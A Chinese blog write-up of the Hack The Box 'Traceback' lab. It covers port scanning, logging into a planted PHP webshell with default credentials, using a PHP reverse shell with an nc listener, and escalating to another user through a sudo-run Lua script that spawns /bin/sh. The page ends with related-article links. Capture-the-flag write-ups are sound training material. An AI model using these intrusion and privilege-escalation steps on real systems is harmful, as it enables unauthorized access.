HTB之Traceback

最新推荐文章于 2021-01-06 15:48:19 发布
最新推荐文章于 2021-01-06 15:48:19 发布
阅读量905 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/106271266
版权



扫描主机开放端口

sudo nmap -A 10.10.10.181

扫描结果

[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 08:53 EDT
Nmap scan report for 10.10.10.181
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/21%OT=22%CT=1%CU=37726%PV=Y%DS=2%DC=T%G=Y%TM=5EC67A4
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=2%ISR=10E%TI=Z%CI=Z%II=I%TS=C)SEQ
OS:(SP=100%GCD=1%ISR=10E%TI=Z%CI=Z%TS=C)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)


Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   271.21 ms 10.10.14.1
2   271.30 ms 10.10.10.181


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.88 seconds

可以看出目标机器开放了22、80端口
先打开网页看看

查看源码

我们得到一个提示:Some of the best web shells that you might need
Google搜索一下


得到以下webshell,尝试在浏览器中进行访问
最终发现存在smevk.php

查看源码发现账号密码都是admin

登录webshell

发现一个名为php-reverse-shell.php的文件,应该可以反弹shell

将文件中的IP修改为我们自己的IP,端口保持默认

然后访问这个文件,本地使用nc进行监听
访问文件之后得到一个shell

进入/home/webadmin目录下有一个note.txt查看给我们一个提示

查看.bah_history得到lua文件的路径

我们先使用/home/sysadmin/luvit这个工具执行lua脚本,可以再新建一个privesc.lua脚本,然后模仿.bash_history执行命令

echo 'os.execute("/bin/sh")' > privesc.lua
$ ls -la
total 48
drwxr-x--- 5 webadmin sysadmin 4096 May 21 07:15 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 May 21 07:08 .ssh
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt
-rw-rw-rw- 1 webadmin webadmin   22 May 21 07:15 privesc.lua
$ cat privesc.lua
os.execute("/bin/sh")
$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode


id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)

我们现在将权限提升到了sysadmin
进入sysadmin目录得到flag

获取Root权限??

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

Windows基线检查(一)

Windows基线检查——剩余信息保护&服务安全

Linux基线检查

IIS7.0 基线检查

Apache 基线检查

扫描二维码

获取更多精彩

NowSec

NowSec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Tunnel Backdoor
02-20
GET / HTTP/1.1 Host: ^bkc Apache Tunnel Backdoor ver0.1 by Xti9er ------------------------------- sh: turning off NDELAY mode uname -a Linux xt9-laptop 2.6.32-28-generic #55-Ubuntu SMP Mon Jan 10 21:21:01 UTC 2011 i686 GNU/Linux
HTB-Obscurity
TA不懒,但还没有添加简介
04-13 207
HTB-Obscurity
hackthebox-traceback(lua提权/ssh密钥覆盖/motd提权)
冬萍子癸水
01-06 570
1、扫描 masscan全局快速扫,nmap再具体扫,不过么,就22 80 俩端口,太常规,没啥新花样。22想到可能有ssh登录,80进web信息搜集。 C:\root> masscan -p1-65535,U:1-65535 10.10.10.181 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-01-06 05:10:33 GMT -- forced options: -sS -Pn -n
Hack The Box——Traceback
江左盟的博客
03-22 6402
简介 信息收集 使用nmap -A --min-rate 10000 -T5 10.10.10.181扫描目标主机,如图: 目标主机开放了22和80端口,运行着Apache http 2.4.29服务,且目标主机操作系统为Ubuntu。然后访问http服务,如图: 漏洞发现 漏洞利用 权限提升 总结 ...
traceback模块
chang995196962的博客
07-04 1620
转载链接: https://blog.csdn.net/lengxingxing_/article/details/56317838 https://www.jianshu.com/p/01ed4b8d7d9a 1. Python中的异常栈跟踪 异常对象默认就包含stacktrace相关的信息,通过异常对象的相关方法printStackTrace()和getStackTrace()等方...
htb
03-11
相关项目。
HTB单线策略测试
08-18
在网络安全和信息技术领域,HTB(Hierarchical Token Bucket,分层令牌桶)是一种流量整形算法,常用于网络设备如路由器和交换机中,用于管理和控制网络数据流的传输速率,确保网络服务的质量和稳定性。本话题我们将...
HTB
02-12
HTB
追溯HTB
02-18
在"traceback-HTB-master"这个压缩包中,可能包含了关于如何设置和调试HTB的详细指南、示例配置文件以及相关的脚本。解压并研究这些文件可以帮助你更深入地理解HTB的工作原理和实际应用,从而在实际网络环境中更好地...
Hack The Box——Scavenger
江左盟的博客
03-23 789
简介 信息收集 使用nmap 10.10.10.155 -A扫描目标主机,如图: 可以看到开启了很多端口(21,22,25,43,53,80)和对应的服务以及版本信息,操作系统是Debian,版本基本上是10.0左右了。 漏洞发现 使用searchsploit和Google搜索相关服务对应版本的漏洞,发现Exim smtpd 4.89存在远程命令执行漏洞(CVE-2017-16...
maogan in tunnel excavation
03-22
隧道建造过程中的支护结构,锚杆的设置,FLAC3D数值仿真计算得到周围岩土体的变形位移情况
正泰BKC系列控制变压器.PDF
11-08
正泰BKC系列控制变压器PDF,
no-turning-back:无路可退。 HTML5 + JS游戏
05-17
无路可退 ##### HTML5 + JS游戏具有内置的关卡编辑器和通过WiFi的虚拟智能手机游戏板。 二手技术和资料库: 带有 带有模板引擎的 预处理器 要部署此游戏,您将需要已安装node.js和npm 。 另外, grunt-cli应全局安装。 如果运行,则可以执行以下操作: npm install grunt-cli -g 那你只需要跑 npm install 在您的项目文件夹中。 另外,您将需要安装ruby和sass gem 。 或者,您可以运行我们的deploy.sh文件。
pip命令报错Traceback (most recent call last): File "/usr/bin/pip", line 9
nbxuwentao的博客
06-22 6525
(1)sudo gedit /usr/bin/pip (2)from pip import main if name == ‘main’: sys.exit(main()) 把这一部分修改成: from pip import main if name == ‘main’: sys.exit(main._main()) (3)退出继续之前的 ...
HTB靶机渗透
萍水间人的小天地
02-18 1047
信息收集 这里可以先设置一下hosts文件 10.10.10.168 obscure.htb 扫描端口发现开放了 8080 的web端口 页面提示有一个源码泄露 Message to server devs: the current source code for the web server is in 'SuperSecureServer.py' in the secret ...
渗透测试2:HTB之Obscurity
d3f4ult的博客
01-16 4178
介绍 Obscurity几乎没有公共漏洞和暴露(Common Vulnerabilities & Exposures),所以kali的msf基本不起作用,对经常使用工具的人来说可能不适应。但却可以学到很多编程的知识。 前期工作 1.改hosts文件和nmap扫端口,在上一个博客已经细说过,这里不再重复。上一篇博客:渗透测试:HTB之OpenAdmin 2.扫出来的端口如下图 扫出来的端口...
qt 出现traceback -----relloc pointer
weixin_33725239的博客
11-19 146
出现这个问题的主要原因是qt的版本冲突,qt4和qt5的问题。只要把。pro的文件中的.so文件换个相应的版本,或者在相应的qt-creator中换个kit尝试。 转载于:https://www.cnblogs.com/wjx-zjut/p/7859491.html...
telnet backdoor
Yatere的天平秤
04-19 812
import socketserver,os PORT = 23 class Handler(socketserver.BaseRequestHandler): def handle(self): while True: t='' self.data = self.request.recv(1024).strip()
一个HTTP Tunnel,可用于Apache
听雨轩
03-25 127
一个HTTP Tunnel,可用于Apache。   开源项目地址: http://sourceforge.net/projects/mod-tunnel/   附件是从SF.net上下载下来的源码及客户端工具的Win32可执行程序,我用VC2005在本机编译客户端程序无法成功,幸好官方提供了可rvtf...
format htb
最新发布
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值